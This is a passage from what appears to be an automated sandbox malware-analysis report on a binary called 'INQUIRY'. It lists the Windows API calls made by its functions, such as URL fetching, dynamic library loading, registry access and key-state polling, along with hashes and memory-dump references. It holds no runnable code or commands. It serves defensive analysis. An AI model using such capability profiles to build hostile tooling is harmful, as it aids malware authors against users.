                                                                                              • Opcode Fuzzy Hash: 3bf5d691ab62327d874f95b9d986977be55f0acb7fff1163f50420c1077177cc
                                                                                              • Instruction Fuzzy Hash: C1210171A04108BEDB14ABB0DC85DFFB7BDDF15360F10462AF421A71E0DF39484A9A10
                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8184C
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A81872
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A818A2
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00A818E9
                                                                                                • Part of subcall function 00A82483: GetLastError.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A82498
                                                                                                • Part of subcall function 00A82483: SetEvent.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A824AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: 474fc04eaee3521e1525548f358e06d89bb7c97f0d4f38ebc5025bc77890fa94
                                                                                              • Instruction ID: 15f634da4b6098aa45c5adaae3f71a3e6550cb8458ed5f404c6898ba0888a70e
                                                                                              • Opcode Fuzzy Hash: 474fc04eaee3521e1525548f358e06d89bb7c97f0d4f38ebc5025bc77890fa94
                                                                                              • Instruction Fuzzy Hash: 852180B1600208BFEB11ABA4DC86EBB7BEDEB48744F10412AF405D7140EB609D0657B1
                                                                                              APIs
                                                                                                • Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
                                                                                                • Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
                                                                                                • Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91
                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A96461
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00A96468
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A9647D
                                                                                              • DestroyWindow.USER32(?), ref: 00A96485
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 4146253029-1011021900
                                                                                              • Opcode ID: 85e58f4a066b4ac2d674080a9cbfc5bee2290ce404be5bcfed443417cdb32074
                                                                                              • Instruction ID: f92fc7a9fd717b8f9993bcdf8a5af899736d3003a2064744916744b5fff80d4e
                                                                                              • Opcode Fuzzy Hash: 85e58f4a066b4ac2d674080a9cbfc5bee2290ce404be5bcfed443417cdb32074
                                                                                              • Instruction Fuzzy Hash: 44215B71300205BFEF108FA4DD84EBB77E9EF99764F148629FA2096190D7719C919760
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00A76DBC
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A76DEF
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00A76E01
                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A76E3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: c57c43c315c2cd2ceb7094ea2825e887e86599be48a6c16a5b23b68ccb82b2c2
                                                                                              • Instruction ID: 6aab6cc012ff306d73f9ec16726de30491b8fdb38febcfd406444201fef98ffa
                                                                                              • Opcode Fuzzy Hash: c57c43c315c2cd2ceb7094ea2825e887e86599be48a6c16a5b23b68ccb82b2c2
                                                                                              • Instruction Fuzzy Hash: D8218175600A09AFDB309F69DC04B9A7BF4EF44720F20CA1AFDA4D72D1DB7099518B64
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A76E89
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A76EBB
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A76ECC
                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A76F06
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: 147719ec1065874dc33e89da5f3e3eadb8dfc0a3c6e9b5ad2eb6382a71fe3802
                                                                                              • Instruction ID: ed3f23fd0ad48945c4445d4d054fbd8902f6ed8ff2c925d264e8cf3546a82a5b
                                                                                              • Opcode Fuzzy Hash: 147719ec1065874dc33e89da5f3e3eadb8dfc0a3c6e9b5ad2eb6382a71fe3802
                                                                                              • Instruction Fuzzy Hash: 202190796007059BDB209F69DC04BAA77B8AF45720F20CA1AF9A8D72D0DB70A8518B61
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A7AC54
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A7ACA8
                                                                                              • __swprintf.LIBCMT ref: 00A7ACC1
                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A9F910), ref: 00A7ACFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                              • String ID: %lu
                                                                                              • API String ID: 3164766367-685833217
                                                                                              • Opcode ID: 000b05206a816782631600f5d9d3aaa56828f9d122d91c6d3ff1a76d9f373a40
                                                                                              • Instruction ID: 63097592650d80ecfc19ec159617546f8457f0512bdac355574b14dd596c46c2
                                                                                              • Opcode Fuzzy Hash: 000b05206a816782631600f5d9d3aaa56828f9d122d91c6d3ff1a76d9f373a40
                                                                                              • Instruction Fuzzy Hash: 7A213035A00109BFCB10DFA5CE45DEE7BB8FF89714B108469F909DB252DA31EA45CB61
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A71B19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                              • API String ID: 3964851224-769500911
                                                                                              • Opcode ID: 91a0ea55d3061b155e5f2b4585c5c7ba77baafb252af565324ff0d6e28ccffee
                                                                                              • Instruction ID: ee7ec8dc931569d88ad4d6fd980b6fa304b63b9346fcd9fbb64ea191eb6e5892
                                                                                              • Opcode Fuzzy Hash: 91a0ea55d3061b155e5f2b4585c5c7ba77baafb252af565324ff0d6e28ccffee
                                                                                              • Instruction Fuzzy Hash: 88115B319002088FCF00EFA8D9619EEB7F4FF65704F5084A9E819A7292EB325D06CB54
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A8EC07
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A8EC37
                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A8ED6A
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A8EDEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2364364464-0
                                                                                              • Opcode ID: b37d28ae3f59895528110170cd25f3e0d26706a69d8e44be975a0072963f2471
                                                                                              • Instruction ID: 8365a523d9592cc8df7ea5f146825a9f88debc123d3dbbd01baf40974c912e9c
                                                                                              • Opcode Fuzzy Hash: b37d28ae3f59895528110170cd25f3e0d26706a69d8e44be975a0072963f2471
                                                                                              • Instruction Fuzzy Hash: 43818F716043009FD720EF28C996F6BB7E5AF48710F14881DF999DB292DB74AC41CB91
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A900FD
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9013C
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A90183
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00A901AF
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A901BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3440857362-0
                                                                                              • Opcode ID: fd4ad3156b2c566e7f532eea9e684dd0fb6188b40ce8aa559bb153d5cae883b0
                                                                                              • Instruction ID: 2417e83342e5510eafbdf8493553e48ce287eedf089197b5809f6f4e2e4f9038
                                                                                              • Opcode Fuzzy Hash: fd4ad3156b2c566e7f532eea9e684dd0fb6188b40ce8aa559bb153d5cae883b0
                                                                                              • Instruction Fuzzy Hash: 06515C71208204AFDB04EF68C981EAEB7F9FF84354F50492DF595872A2DB31E945CB52
                                                                                              APIs
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A8D927
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A8D9AA
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A8D9C6
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A8DA07
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A8DA21
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 327935632-0
                                                                                              • Opcode ID: 5dbf1a310d1fada2a9ba5aa792014c4343cc564d1f4e5fd8e42035abc4e185a0
                                                                                              • Instruction ID: 4358c8e65afabc117758f11e920fc6f3f4541bf68f3bdad7538b4f381a18e934
                                                                                              • Opcode Fuzzy Hash: 5dbf1a310d1fada2a9ba5aa792014c4343cc564d1f4e5fd8e42035abc4e185a0
                                                                                              • Instruction Fuzzy Hash: 8B513735A04209DFCB04EFA8C5849ADB7F8FF48310B148166E859AB362DB30ED85CF91
                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A7E61F
                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A7E648
                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A7E687
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A7E6AC
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A7E6B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1389676194-0
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 00A12357
                                                                                              • ScreenToClient.USER32(00AD57B0,?), ref: 00A12374
                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00A12399
                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 00A123A7
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                              • String ID:
                                                                                              • API String ID: 4210589936-0
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A663E7
                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00A66433
                                                                                              • TranslateMessage.USER32(?), ref: 00A6645C
                                                                                              • DispatchMessageW.USER32(?), ref: 00A66466
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A66475
                                                                                              Similarity
                                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                              • String ID:
                                                                                              • API String ID: 2108273632-0
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A68A30
                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00A68ADA
                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A68AE2
                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00A68AF0
                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A68AF8
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00A6B204
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A6B221
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A6B259
                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A6B27F
                                                                                              • _wcsstr.LIBCMT ref: 00A6B289
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                              • String ID:
                                                                                              • API String ID: 3902887630-0
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9B192
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A9B1B7
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A9B1CF
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00A9B1F8
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A80E90,00000000), ref: 00A9B216
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2294984445-0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A69320
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A69352
                                                                                              • __itow.LIBCMT ref: 00A6936A
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A69392
                                                                                              • __itow.LIBCMT ref: 00A693A3
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2983881199-0
                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 00A85A6E
                                                                                              • GetForegroundWindow.USER32 ref: 00A85A85
                                                                                              • GetDC.USER32(00000000), ref: 00A85AC1
                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00A85ACD
                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00A85B08
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                              • String ID:
                                                                                              • API String ID: 4156661090-0
                                                                                              APIs
                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A1134D
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A1135C
                                                                                              • BeginPath.GDI32(?), ref: 00A11373
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A1139C
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: 2d8323ab5bdc3689d7388da4717bcb613ef1e626fd9bac4c55741ba404fb0f3e
                                                                                              • Instruction ID: e2b482acd5b45cccbab417764ef8337e92658e5f528327c4833e19a3039b7292
                                                                                              • Opcode Fuzzy Hash: 2d8323ab5bdc3689d7388da4717bcb613ef1e626fd9bac4c55741ba404fb0f3e
                                                                                              • Instruction Fuzzy Hash: 7C215930D01608EFDB10DFA5EC047AD7BA8EB00322F184227E9229A1B4D7709892EF90
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: b9c4d19e376c57b1da537674bff25d2f8f9cc45ac0892e829e62443a490eff02
                                                                                              • Instruction ID: e0254b59461a504b9e20235ed35accb60a8d8e0ac5f0d0c008a0005a5c96ae09
                                                                                              • Opcode Fuzzy Hash: b9c4d19e376c57b1da537674bff25d2f8f9cc45ac0892e829e62443a490eff02
                                                                                              • Instruction Fuzzy Hash: 2401B5B26101157BD3046B196E42FFBB37CEE55398F044421FE15D7282EB61DF6082B0
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A74ABA
                                                                                              • __beginthreadex.LIBCMT ref: 00A74AD8
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00A74AED
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A74B03
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A74B0A
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 3824534824-0
                                                                                              • Opcode ID: 9b1edbba254f5e7bd43eebdb73b4872f0ee0b46d63b028b38192969e2c04268f
                                                                                              • Instruction ID: 6f945ee23c6e170eb074849b3657d3b9715487a57e6b5834d8cf727e61e9764b
                                                                                              • Opcode Fuzzy Hash: 9b1edbba254f5e7bd43eebdb73b4872f0ee0b46d63b028b38192969e2c04268f
                                                                                              • Instruction Fuzzy Hash: 6C11E576A09214BFCB01CBF89C08ADB7BACAB49320F148266F919D3250DB718D0587A0
                                                                                              APIs
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A6821E
                                                                                              • GetLastError.KERNEL32(?,00A67CE2,?,?,?), ref: 00A68228
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00A67CE2,?,?,?), ref: 00A68237
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00A67CE2,?,?,?), ref: 00A6823E
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A68255
                                                                                              Similarity
                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 842720411-0
                                                                                              • Opcode ID: c0faeb3366a0476c3f7e89b38101e0f31b4b44160adac0767ae5241b9cb2a504
                                                                                              • Instruction ID: d0271b949fc63039451a6964e8fa4242fe79627d5625c18e28a9716ca41bc826
                                                                                              • Opcode Fuzzy Hash: c0faeb3366a0476c3f7e89b38101e0f31b4b44160adac0767ae5241b9cb2a504
                                                                                              • Instruction Fuzzy Hash: 8C016DB1304204BFDB208FB5DC48DAB7BBCEF8A755B60062AF919C2220DE318C41CA60
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?,?,00A67455), ref: 00A67127
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67142
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67150
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?), ref: 00A67160
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A6716C
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: 66d54d75c45c23c43332f1104c9f16b15e25ee32d110e7ce18d74d8a2f92d7d5
                                                                                              • Instruction ID: 8200801e2d438a3e226a84e85f37c951ae44c143b8e788b351857f644dc4c5a5
                                                                                              • Opcode Fuzzy Hash: 66d54d75c45c23c43332f1104c9f16b15e25ee32d110e7ce18d74d8a2f92d7d5
                                                                                              • Instruction Fuzzy Hash: 5C017CB2621204AFDB118FA4DC44AAE7BBDEB45795F144266FD04D2220DB71DD429BA0
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A75260
                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A7526E
